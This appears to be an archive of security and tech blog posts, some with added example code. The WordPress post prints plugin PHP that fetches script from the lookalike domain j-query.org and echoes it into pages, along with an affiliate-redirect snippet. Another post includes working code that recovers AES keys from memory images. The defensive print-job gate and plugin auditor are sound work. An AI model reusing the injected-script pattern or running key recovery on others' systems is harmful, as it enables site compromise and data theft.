hacking

Don’t Buy A Toshiba Laptop

…as the company seems determined, to the point of threatening legal action, to hide information from you about how to upgrade or repair them.

If you want to spend your money with a more enlightened company, try HP, Dell or Lenovo (although apparently business laptops only, which is disappointing).

B2G on Raspberry Pi

This is awesome. Well done to Oleg Romashin.

More “Transmittable” Short URLs

URL shortening services are very popular. They basically redirect a short URL – e.g. bit.ly/ABC123 – to a longer URL. (And keep logs, which can be monetized, hence Twitter’s t.co service and the requirement that tweets use it.) Most URL shortening services use the following set of characters in the unique tag: [A-Za-z0-9] – a total of 62. 6 characters is a normal number for the tag.

However, when reading such a short URL to someone, e.g. over the phone or across a conference table, a couple of problems can occur:

  • The person reading may misread; they may read “l” for “1” or “0” for “O”.
  • The person reading may under-specify, most commonly by not expressing the case.

This makes reading out such short URLs a pain, as one has to make sure to specify case correctly, and to distinguish between similar-looking characters in a possibly-unfamiliar font, or in handwriting. These problems could be avoided, and URL reading would be much easier, if the set was instead [a-km-np-z0-9], and the shortener service treated a submitted tag as case-insensitive.

This would give a choice of only 34 characters. Surely that would mean the tag would have to be much longer? Actually no:

  • 62^6 = 56800235584
  • 34^6 = 1544804416
  • 34^7 = 52523350144

Short URLs could be made more transmittable at the cost of being only one character longer: seven characters from the 34-character set give about 52.5 billion tags, within 8% of the 56.8 billion that six characters from the 62-character set give. I think some service might find that worth doing…
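The scheme sketched above, as an added example (not code from the post or from any shortening service): a base-34 encoder/decoder over [a-km-np-z0-9] whose decoder ignores case and, because 'l' and 'o' can never be valid, reads them as the digits they are confused with. The alphabet order, the fixed zero-padded width and that tolerant-reading rule are this example's own assumptions.

```python
"""Transmittable short-URL tags over the 34-character set [a-km-np-z0-9].

Added example, not code from the original post or from any shortening
service. The alphabet order, the zero-padded fixed width and the choice to
read a received 'l' as '1' and 'o' as '0' (neither letter is valid in this
alphabet, so they can only be misreadings) are this example's own decisions.
"""

# Digits first, then the lower-case letters with 'l' and 'o' removed: 34 symbols.
ALPHABET = "0123456789abcdefghijkmnpqrstuvwxyz"
BASE = len(ALPHABET)  # 34
_VALUE = {c: i for i, c in enumerate(ALPHABET)}


def encode_tag(n, width=7):
    """Turn a non-negative integer (e.g. a database row id) into a fixed-width tag."""
    if n < 0 or n >= BASE ** width:
        raise ValueError("id %d does not fit in %d base-%d symbols" % (n, width, BASE))
    out = []
    for _ in range(width):
        n, r = divmod(n, BASE)
        out.append(ALPHABET[r])
    return "".join(reversed(out))


def normalize_tag(tag):
    """Apply the tolerant reading rules before lookup: ignore case, and map the
    two letters deliberately left out of the alphabet back to the digit they
    are most often confused with."""
    return tag.strip().lower().replace("l", "1").replace("o", "0")


def decode_tag(tag):
    """Inverse of encode_tag for any spelling a human might have transcribed."""
    n = 0
    for c in normalize_tag(tag):
        if c not in _VALUE:
            raise ValueError("invalid character %r in tag %r" % (c, tag))
        n = n * BASE + _VALUE[c]
    return n


def tag_length_for(ids_needed, base=BASE):
    """Smallest tag width that gives at least ids_needed distinct tags."""
    width = 1
    while base ** width < ids_needed:
        width += 1
    return width


if __name__ == "__main__":
    tag = encode_tag(123456789)
    # The upper-cased, 'l'-for-'1' spelling decodes to the same id.
    print(tag, decode_tag(tag), decode_tag(tag.upper().replace("1", "l")))
    # A 50-billion-id space needs 6 symbols from 62 characters but 7 from 34.
    print(tag_length_for(50_000_000_000, 62), tag_length_for(50_000_000_000, 34))
```

The shortener stores tags in canonical form and runs every submitted tag through normalize_tag before the lookup, so "ZZZZZZZ", "zzzzzzz" and a hand-written tag with a stray "l" all resolve to the same record.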

LastFM investigating passwords hack

Yesterday, LinkedIn started investigating a password leak, followed by online dating site eHarmony, and now online music streaming site LastFM has announced on its blog that it too is investigating the leak of user passwords. As a precautionary measure, it is advising all users to change their passwords immediately. You can do that here.

Yesterday, a Russian hacker reportedly stole 6.5 million LinkedIn passwords and 1.5 million passwords from eHarmony. It is not yet known if the hacking incidents are related.

It’s worth repeating the password tips my colleague Jindrich Kubec wrote in an earlier blog post.

A simple 5 step procedure for creating new passwords:

  1. Avoid anything ‘personal’ such as names and birth dates – see this list for examples of passwords to avoid
  2. Avoid overly complex passwords as you don’t want to write them down
  3. Don’t reuse passwords anywhere – leaks will happen in the future and you don’t want a single leak giving the bad guys keys to all the online services you use
  4. Longer passwords are always better
  5. Beware the phishers: always ensure you’re doing sensitive operations on the legitimate site, under a secure and verified connection. I’d also recommend never clicking on links in emails to update sensitive information. Instead, manually enter the site and make changes.

Native Firefox for Android Beta

At this point, you have probably heard the news. Yes, we’ve released the first public Beta of Firefox for Android with all the goodness that we’ve been working on in the last 7 months: the brand new native UI that is lighter, faster, and sleeker. Here are some big picture highlights about this Beta.

Design direction. The new native UI design is part of a wider effort in Mozilla to streamline the visual identity of Firefox across multiple platforms—desktop and mobile. Firefox should feel like one consistent product everywhere. Have a look at Madhava’s slide deck for more information on what the Firefox design team has been up to lately.

Keep in mind that this first native UI release is just the first of many iterations. For instance, there’s a lot of interesting changes coming up as part of our work on the native tablet UI that will eventually trickle down to the phone UI as well.

Panning and zooming. If you’re using the Beta already (or have been using the Nightly or Aurora builds) you’ll notice how much smoother panning and zooming are. This is because the Beta features a major revamp of the graphics and rendering infrastructure using tiled rendering and an off-main-thread layer compositor. I recommend reading Benoit Girard’s and Chris Lord’s blog posts for further details. It’s worth mentioning that the Mobile Platform and Graphics teams did amazing work to implement all this in a rather short period!

Places and Sync. The Places database has been re-implemented in Firefox for Android as a private Content Provider for two reasons. First of all, it gives instant access to history and bookmarks even before Gecko is up, i.e. a much faster startup experience. Secondly, it allows the new native Firefox Sync—which is now nicely integrated with the system’s sync UI—to access your browsing history and bookmarks even when Firefox is not running.

We’ve already started working on new features for the following releases, including the native UI for Firefox on Android tablets and a reader mode. As you can see, the upcoming Firefox for Android is a whole new beast. We are working hard to make it the best mobile browser out there. You can help us now by testing the Beta as part of our Mobile Test Drivers Program!

With the native UI, we’re creating a new baseline for innovation on Firefox Mobile. And it will only get better from now on. What are you waiting for? Download the Firefox for Android Beta now!

Tens of millions of HP LaserJet printers vulnerable to remote hacking

It seems, though HP is yet to confirm it, that researchers from Columbia University have found a security hole in “tens of millions” of HP LaserJet printers that allows a remote hacker to install new and dangerous firmware on the device. In one example, the researchers used the vulnerability to hack a printer’s fuser — the heating element that bonds the toner pigment to the paper — causing the paper to turn brown and begin to smoke.

The attack vector is depressingly simple: every time a vulnerable LaserJet printer accepts a print job, it scans that job to see if it includes a firmware update. Unbelievably, the printer doesn’t then check the source of the update; HP doesn’t digitally sign its updates, so the printer has no signature to look for. In other words, you can reverse engineer one of HP’s firmware updates, program your own, and then insert it into a print job. You can install whatever software you like on millions of network- and internet-connected LaserJet printers.

Beyond the terrifying burning-paper example, Columbia also showed some hacked firmware that detected when a tax return was being printed, and then extracted the Social Security number and forwarded it to a Twitter feed. Really, though, the possibilities of what a hacked printer could do are endless; it’s effectively just another computer on the network. You could make a botnet out of hacked printers, even.

Now, at first this might sound like a local vulnerability — many printers are connected to the internet via the LAN, but they’re hidden behind NAT and hard to reach — but what if an employee at a company is spear-phished with a hacked-firmware-laden PDF or DOC? The main problem, though, is that HP and its customers have no real way of patching this hole. There’s no global update that HP can trigger. Even worse, there’s no way for companies to tell if their printers have been hacked. The only real solution would be to replace every printer in the office. It’s worth noting that other (non-HP) printers, copiers, and all-in-one thingamajigs are probably vulnerable to a similar attack, too.
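Until printers verify what they load, the place a defender can still act is the print path itself. The following is an added example (not code from the article, from HP or from the Columbia researchers) of the compensating control a print server or network sensor can apply: parse the job's PJL (Printer Job Language) header lines, refuse any that carry device-modifying commands, and let a firmware image through only when its SHA-256 matches an image the administrator obtained from the vendor and pinned in advance. It assumes that HP's RFU update files introduce the firmware with an "@PJL UPGRADE SIZE=<bytes>" line (treat the keyword and the FS* command list as assumptions to extend for your fleet); the two sample jobs are constructed for the demo, not captured traffic.

```python
"""Inspect a spooled print job for PJL commands that modify the printer.

Added example, not code from the article, HP or the Columbia researchers.
Assumption: HP RFU files carry the image after an '@PJL UPGRADE SIZE=n'
line; the DEVICE_MODIFYING list is a policy to extend for your fleet.
"""
import hashlib
import re

UEL = b"\x1b%-12345X"  # PJL Universal Exit Language sequence that frames a job

# Commands that alter the device rather than print a page. UPGRADE loads
# firmware, the FS* family writes to the printer's file system (persistence).
DEVICE_MODIFYING = {"UPGRADE", "FSDOWNLOAD", "FSINIT", "FSDELETE", "FSMKDIR"}

# A PJL line: "@PJL", optional whitespace, a command word, the rest of the line.
_PJL_LINE = re.compile(rb"@PJL[ \t]*([A-Za-z]*)([^\r\n]*)(\r\n|\n|\r)?")


def parse_pjl(job):
    """Return (offset, command, args, payload) for each @PJL line in the job.

    payload is the raw bytes declared by an UPGRADE line's SIZE= argument
    (b"" for any other command). The scanner skips over that payload so that
    bytes inside the firmware blob are never re-read as commands.
    """
    records = []
    pos = 0
    while True:
        start = job.find(b"@PJL", pos)
        if start < 0:
            break
        m = _PJL_LINE.match(job, start)
        cmd = m.group(1).decode("ascii").upper()
        args = m.group(2).decode("latin-1").strip()
        pos = m.end()
        payload = b""
        if cmd == "UPGRADE":
            size = re.search(r"SIZE=(\d+)", args, re.IGNORECASE)
            length = int(size.group(1)) if size else 0
            payload = job[pos:pos + length]
            pos += length
        records.append((start, cmd, args, payload))
    return records


def fingerprint(data):
    """Hex SHA-256 used to pin known-good firmware images."""
    return hashlib.sha256(data).hexdigest()


def inspect_print_job(job, allowed_firmware=frozenset()):
    """Gate a job before it reaches the printer.

    Returns ("accept" | "reject", findings); a finding is
    (offset, command, detail, blocking).
    """
    findings = []
    for offset, cmd, args, payload in parse_pjl(job):
        if cmd not in DEVICE_MODIFYING:
            continue
        if cmd == "UPGRADE":
            digest = fingerprint(payload)
            known = digest in allowed_firmware
            detail = ("pinned firmware " if known else "unrecognised firmware ") + digest[:16]
            findings.append((offset, cmd, detail, not known))
        else:
            findings.append((offset, cmd, args, True))
    verdict = "reject" if any(f[3] for f in findings) else "accept"
    return verdict, findings


# --- constructed sample jobs (demo input, not real captures) ----------------
BENIGN_JOB = (
    UEL + b"@PJL\r\n"
    + b'@PJL JOB NAME="quarterly-report.pdf"\r\n'
    + b"@PJL SET COPIES=1\r\n"
    + b"@PJL ENTER LANGUAGE=PCL\r\n"
    + b"\x1bE...PCL page data stands in here...\x1bE"
    + UEL + b"@PJL EOJ\r\n" + UEL
)

FAKE_FIRMWARE = b"\x7fELF-stand-in-for-a-firmware-image"  # constructed blob

ROGUE_JOB = (
    UEL + b"@PJL\r\n"
    + b'@PJL JOB NAME="invoice.pdf"\r\n'
    + b"@PJL UPGRADE SIZE=" + str(len(FAKE_FIRMWARE)).encode() + b"\r\n"
    + FAKE_FIRMWARE
    + b"\r\n@PJL ENTER LANGUAGE=PCL\r\n"
    + b"\x1bE...a normal looking page follows...\x1bE"
    + UEL + b"@PJL EOJ\r\n" + UEL
)

if __name__ == "__main__":
    for name, job in (("benign", BENIGN_JOB), ("rogue", ROGUE_JOB)):
        print(name, inspect_print_job(job))
    # The same rogue job passes once its image is one the administrator pinned.
    print("rogue, pinned:", inspect_print_job(ROGUE_JOB, {fingerprint(FAKE_FIRMWARE)})[0])
```

Hash pinning is a stand-in for the signature the printer should be checking itself: it only helps when every update reaches the printer through the gated path, so the printer's raw port 9100 has to be reachable from the print server alone, not from every desktop.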

To be honest, we shouldn’t be surprised that such a hole exists; depressed, perhaps, but not surprised. You might not be aware, but almost every network- or internet-connected device, from a car’s on-board telematics to a self-aware refrigerator, is a computer – as in a processor, network interface, some memory, and an operating system. In the case of printers, it’s usually a computer running VxWorks or an embedded version of Linux. These devices, like your Android phone, Linux server, or Windows PC, are just as vulnerable to malware, viruses, and SQL injection. As you know, manufacturers generally take shortcuts to get their products to market sooner — and if there has never been a known case of the device being exploited, as is the case with printers, you can see why HP might skimp when it comes to security measures.

It’s a very similar story to the hackable insulin pump or opening a car door via SMS. It’s not hard to secure these systems, it just doesn’t seem like a worthwhile activity until a security researcher shows a proof-of-concept attack — and then everyone moves very, very rapidly to patch the hole before the metaphorical ship sinks. The problem here, though, is that most cases of “security through obscurity” occur in rare, off-the-grid devices. There might only be a few thousand wireless insulin pumps in the world, and they’re not connected to the internet. HP has sold 100 million LaserJet printers since 1984, and they’re all connected to the internet or a computer.

Read more at MSNBC

Update @ 15:44 ET: HP has posted a response on the situation. Basically, it suggests that every LaserJet printer has a “thermal breaker,” which would prevent paper (or the printer?) from catching fire. The rest of the release basically confirms that there’s a gaping security hole and that they’re working on a firmware fix. With no centralized update service, though, it’s safe to assume that unpatched printers will be around for years to come.

[Image credit: Chris Hills -- and that's an InkJet, not a LaserJet, incidentally]

Full disk encryption is too good, says US intelligence agency

You might be shocked to learn this, but when a quivering-lipped Chloe from 24 cracks the encryption on a terrorist’s hard drive in 30 seconds, the TV show is faking it. “So what? It’s just a TV show.” Well, yes, but it turns out that real federal intelligence agencies, like the FBI, CIA, and NSA, also have a problem cracking encrypted hard disks — and according to a new research paper, this is a serious risk to national security.

The study, titled “The growing impact of full disk encryption on digital forensics,” illustrates the difficulty that CSI teams have in obtaining enough digital data to build a solid case against criminals. According to the researchers, one of whom is a member of US-CERT — the US government’s primary defense against internet and digital threats — there are three main problems with full disk encryption (FDE): First, evidence-gathering goons can turn off a computer (for transportation) without realizing it’s encrypted, and thus can’t get back at the data (unless the arrestee gives up his password, which he doesn’t have to do); second, if the analysis team doesn’t know that the disk is encrypted, it can waste hours trying to read something that’s ultimately unreadable; and finally, in the case of hardware-level disk encryption, tampering with the device can trigger self-destruction of the data.

The paper does go on to suggest some ways to ameliorate these issues, though: Better awareness at the evidence-gathering stage would help, but it also suggests “on-scene forensic acquisition” of data, which involves ripping unencrypted data from volatile, live memory (presumably the cold-boot technique, in which chilled RAM retains its contents long enough to be imaged). Ultimately, though, the researchers aren’t hopeful: “Research is needed to develop new techniques and technology for breaking or bypassing full disk encryption,” concludes the paper.
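What acquisition from live memory actually yields, as an added example that is not part of the article or the paper: the key-schedule search from Halderman et al.'s cold-boot work. AES software keeps the 176-byte expanded key (the key itself followed by ten round keys) in RAM, so any 16 bytes whose FIPS-197 expansion equals the 160 bytes after them is a live AES-128 key, and the disk can be unlocked without the password. Two simplifications are this example's own: exact matching only, with no correction for the bit decay a real cold-boot image shows, and a memory image constructed from a seeded PRNG with one planted schedule rather than a capture.

```python
"""Recover AES-128 keys from a memory image by locating their key schedules.

Added example, not code from the paper the article discusses. Implements the
search from Halderman et al.'s cold-boot work with two simplifications:
exact matching only (no bit-decay correction) and a constructed image.
"""
import random


def _gf_mul(a, b):
    """Multiply in GF(2^8) with the AES polynomial x^8 + x^4 + x^3 + x + 1."""
    r = 0
    while b:
        if b & 1:
            r ^= a
        a <<= 1
        if a & 0x100:
            a ^= 0x11B
        b >>= 1
    return r


def _build_sbox():
    """AES S-box: multiplicative inverse followed by the affine map."""
    sbox = [0x63] * 256        # 0 has no inverse; S(0) = 0x63
    for x in range(1, 256):
        inv = next(y for y in range(1, 256) if _gf_mul(x, y) == 1)
        v = inv
        for i in range(1, 5):  # v ^= rotl(inv, 1..4)
            v ^= ((inv << i) | (inv >> (8 - i))) & 0xFF
        sbox[x] = v ^ 0x63
    return sbox


SBOX = _build_sbox()


def aes128_key_schedule(key):
    """FIPS-197 key expansion: 16-byte key -> 176-byte schedule."""
    w = [list(key[i:i + 4]) for i in range(0, 16, 4)]
    rcon = 0x01
    for i in range(4, 44):
        t = list(w[i - 1])
        if i % 4 == 0:
            t = [SBOX[b] for b in t[1:] + t[:1]]  # RotWord then SubWord
            t[0] ^= rcon
            rcon = _gf_mul(rcon, 2)
        w.append([w[i - 4][j] ^ t[j] for j in range(4)])
    return bytes(b for word in w for b in word)


def find_aes128_keys(image):
    """Return [(offset, key)] for every exact AES-128 schedule in image."""
    hits = []
    for off in range(len(image) - 176 + 1):
        k = image[off:off + 16]
        # Cheap filter: the first word of round key 1 must equal the next 4 bytes.
        t = [SBOX[k[13]] ^ 0x01, SBOX[k[14]], SBOX[k[15]], SBOX[k[12]]]
        if bytes(k[j] ^ t[j] for j in range(4)) != image[off + 16:off + 20]:
            continue
        if aes128_key_schedule(k) == image[off:off + 176]:
            hits.append((off, k))
    return hits


def constructed_image(key, size=16384, offset=4096, seed=7):
    """Random-looking memory with one planted key schedule (constructed data)."""
    rng = random.Random(seed)
    buf = bytearray(rng.getrandbits(8) for _ in range(size))
    buf[offset:offset + 176] = aes128_key_schedule(key)
    return bytes(buf)


if __name__ == "__main__":
    key = bytes.fromhex("2b7e151628aed2a6abf7158809cf4f3c")  # FIPS-197 sample key
    for off, found in find_aes128_keys(constructed_image(key)):
        print("AES-128 key at offset 0x%x: %s" % (off, found.hex()))
```

The four-byte pre-filter is what makes a byte-by-byte scan of a multi-gigabyte image affordable; the full expansion runs only on the handful of offsets that survive it. Tolerating decayed bits means replacing the equality test with a Hamming-distance threshold, which is what the original tool did.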

It’s a tough situation: On the one hand, being able to crack full disk encryption is vital for the prosecution of white-collar criminals, child porn ringleaders, pharmaceutical spam barons, and the curtailment of terrorism — but on the other, it’s quite satisfying to know that, perhaps at long last, we have a way of escaping the ireful eye of Big Brother. Where do you stand on FDE?

Read more at ScienceDirect

Beware Fake jQuery Inclusions by WordPress Plugins in the Repo

We received an email today from a WordPress user who wanted to alert us to a jQuery hack. At first, I’ve got to admit, I was a little bit sceptical but I thought it was worth looking into. I was surprised by what I found.

We all love jQuery – sometimes I like to daydream about marrying it in some sort of exotic ceremony in Barbados. In fact, it’s so awesome that it’s become a little bit ubiquitous. There are so many plugins using jQuery that we’re totally used to finding it in them.

Normally a WordPress plugin will get jQuery from just a few places:

  • Google CDN
  • WordPress itself
  • Microsoft CDN
  • jQuery CDN

But what if you had a plugin that was getting its jQuery from http://j-query.org?

That seems pretty legit, right? I mean it’s got j-query in the damned domain! And when you visit it, you end up at http://jquery.org – the official site of jQuery.

Oh… wait…. http://j-query.org and http://jquery.org – they’re not the same, are they?

No, they’re not. And http://j-query.org isn’t even registered by the people at jQuery. It’s registered through Domains by Proxy, and forwards to servers at Media Temple.

So it’s got to be suspicious when you find three WordPress plugins that all contain this piece of code:

if (function_exists('curl_init')) {
	// On every page load, fetch a "jQuery" file over plain HTTP from the lookalike domain...
	$url = "http://www.j-query.org/jquery-1.6.3.min.js";
	$ch = curl_init();
	$timeout = 5;
	curl_setopt($ch, CURLOPT_URL, $url);
	curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
	curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
	$data = curl_exec($ch);
	curl_close($ch);
	// ...and write whatever came back straight into the page, unchecked.
	echo "$data";
}

There are three plugins containing this code. They are:

All three of these plugins are from the same person – iintensemedia who runs the site Iintense Media (also registered through Domains by Proxy, nameservers at Media Temple – doesn’t mean anything, am just sayin’, right?).

Let’s take a look at one of these in trac:

Quick coupon in the WordPress repo

Now, I expect you’ll go running off to that j-query link and then you’ll come running back and be all “Siobhan!” (and btw, it’s pronounced Shavonne – get it right before you shout at me plz. anyway…..) “Siobhan! It’s just a blank page! WTF?”

Yes, I am aware of that – it looks like the offending js has been removed. But a little bit of investigation tells us what it does.

1. The First Clue

Check out this forum thread in which the excited alexpike mentions to the dev that the plugin inserts the following into his header:

<script type="text/javascript">
var now = new Date().getTime();
// roughly one page load in eight is redirected to the affiliate tracker
if (now%8 == 0) {
window.location = "http://trk.cpainfinity.com/SHD1";
}
</script>

How does the dev respond?

2. The Plot Thickens

That’s not the only place where someone posted about noticing strange JS being added to their website. A member of the Black Hat World Forums was concerned when his website was hacked.

The member said that this file: http://www.j-query.org/jquery-1.6.4.min.js was populating his site with CPA Infinity Affiliate links. CPA Infinity? Where have we seen that before? In the first clue, dingbats. These are affiliate backlinks to CPA Infinity.

Which means that someone has been making money with some fake http://j-query.org site which is fooling people into thinking that they’re getting some delicious jQuery but they’re actually sending about 1 in every 8 of your visitors to the CPA Infinity link.

Anyway, CPA Infinity didn’t seem to be too impressed about it as their founder has banned the user. Perhaps that’s why the js file is no longer working.

Update: A commenter has noted this link.

the link leads to a black hat seo page

Who’s behind it?

Obviously I couldn’t say. Iintensemedia seems like a good community-minded guy who is always looking for orphaned plugins to adopt. And not at all interested in Black Hat SEO:

What’s the Moral of the Story?

Well kids, every good story has got a good moral, and this one does too.

The WordPress Plugin Directory is not infallible. Things get in that can exploit your WordPress website. We’ve written about this before. Unfortunately it’s the case that while the Theme Directory has got strict review guidelines and a committed review team, the Plugin Directory has nothing comparable. We all trust the plugin directory implicitly (we recommended one of the above plugins ourselves) but maybe we aren’t right to do so. Our assumption that the plugin directory is the safest place to get a plugin from maybe isn’t correct. The plugin directory most definitely has its weaknesses, and its weaknesses are the weaknesses of everyone who runs their website on WordPress.

Install some security plugins to keep watch on your site, and be careful where you get your scripts from – you never know what you might catch! ;)
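One way to "be careful where you get your scripts from" before a plugin goes live, as an added example that is not code from this post, from WordPress or from any plugin: a static check over plugin source that flags URLs on hosts outside the usual jQuery sources listed above, rates a host as a lookalike when one of its labels spells a trusted brand once hyphens are removed (j-query.org), and raises the severity when the URL sits next to a runtime fetch (curl_init, file_get_contents, wp_remote_get) and an echo, i.e. the fetch-and-inject pattern in the snippet quoted above. The allow-listed hostnames are this example's assumption of what the four sources resolve to; the two plugin excerpts are constructed for the demo, the rogue one mirroring the quoted curl/echo code.

```python
"""Audit WordPress plugin source for remote script inclusion from unexpected hosts.

Added example, not code from the post, WordPress or any plugin. A static
heuristic: the allow-listed hostnames and brand list are assumptions, and
the two plugin excerpts at the bottom are constructed demo input.
"""
import re

# Hosts a plugin may legitimately pull jQuery from (assumed list).
KNOWN_SCRIPT_HOSTS = {
    "ajax.googleapis.com",    # Google CDN
    "ajax.aspnetcdn.com",     # Microsoft CDN
    "ajax.microsoft.com",
    "code.jquery.com",        # jQuery CDN
}
BRANDS = ("jquery", "wordpress", "google")

_URL = re.compile(r"""https?://([A-Za-z0-9.-]+)[^\s"'<>)]*""")
_FETCH = re.compile(r"\b(curl_init|curl_exec|file_get_contents|wp_remote_get|fopen)\b")
_EMIT = re.compile(r"\b(echo|print|printf)\b")


def is_lookalike(host):
    """True when a host label spells a trusted brand once hyphens are removed,
    e.g. 'www.j-query.org' -> label 'j-query' -> 'jquery'."""
    for label in host.lower().split("."):
        squashed = label.replace("-", "")
        if any(brand in squashed for brand in BRANDS):
            return True
    return False


def audit_plugin_source(src, window=400):
    """Return [(host, url, reasons)] for every URL the plugin references from
    a host that is neither a known CDN nor wordpress.org."""
    findings = []
    for m in _URL.finditer(src):
        host = m.group(1).lower()
        if host in KNOWN_SCRIPT_HOSTS or host == "wordpress.org" or host.endswith(".wordpress.org"):
            continue
        reasons = []
        if is_lookalike(host):
            reasons.append("lookalike of a trusted domain")
        # Look at the code around the URL: fetched at runtime and echoed is the
        # pattern that turns a remote file into arbitrary code on every page.
        around = src[max(0, m.start() - window):m.end() + window]
        if _FETCH.search(around) and _EMIT.search(around):
            reasons.append("remote content fetched at runtime and echoed into the page")
        elif m.group(0).lower().endswith(".js"):
            reasons.append("script loaded from an unknown host")
        if reasons:
            findings.append((host, m.group(0), reasons))
    return findings


# --- constructed plugin excerpts (demo input, not real plugin code) ----------
ROGUE_PLUGIN = r'''<?php
function qc_footer() {
    if (function_exists('curl_init')) {
        $url = "http://www.j-query.org/jquery-1.6.3.min.js";
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        $data = curl_exec($ch);
        curl_close($ch);
        echo "$data";
    }
}
'''

VENDOR_PLUGIN = r'''<?php
function qc_scripts() {
    wp_enqueue_script('jquery', 'https://ajax.googleapis.com/ajax/libs/jquery/1.6.3/jquery.min.js');
    wp_enqueue_script('qc-widget', 'https://cdn.example-vendor.net/qc-widget.js');
}
'''

if __name__ == "__main__":
    for name, src in (("rogue", ROGUE_PLUGIN), ("vendor", VENDOR_PLUGIN)):
        print(name, audit_plugin_source(src))
```

The vendor excerpt shows the intended tiers: the Google CDN URL is skipped, the vendor's own script host is reported only as an unknown host for a human to check, and the rogue excerpt gets both the lookalike and the fetch-and-echo reasons. A heuristic like this belongs in the review step before a plugin is installed; it says nothing about what a remote file serves on a given day, which is why the j-query.org file could be benign one week and a redirect the next.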

Were you affected by any of these plugins? We’d love to hear your story in the comments.

The Google Job Experiment

When top advertising creative directors Googled themselves, they got a message from me asking for a job. Download a high res Quicktime of the experiment here: http://alec.at/gqqR2T More of my work here: http://www.alecbrownstein.com My tweets here: http://twitter.com/jusfonzin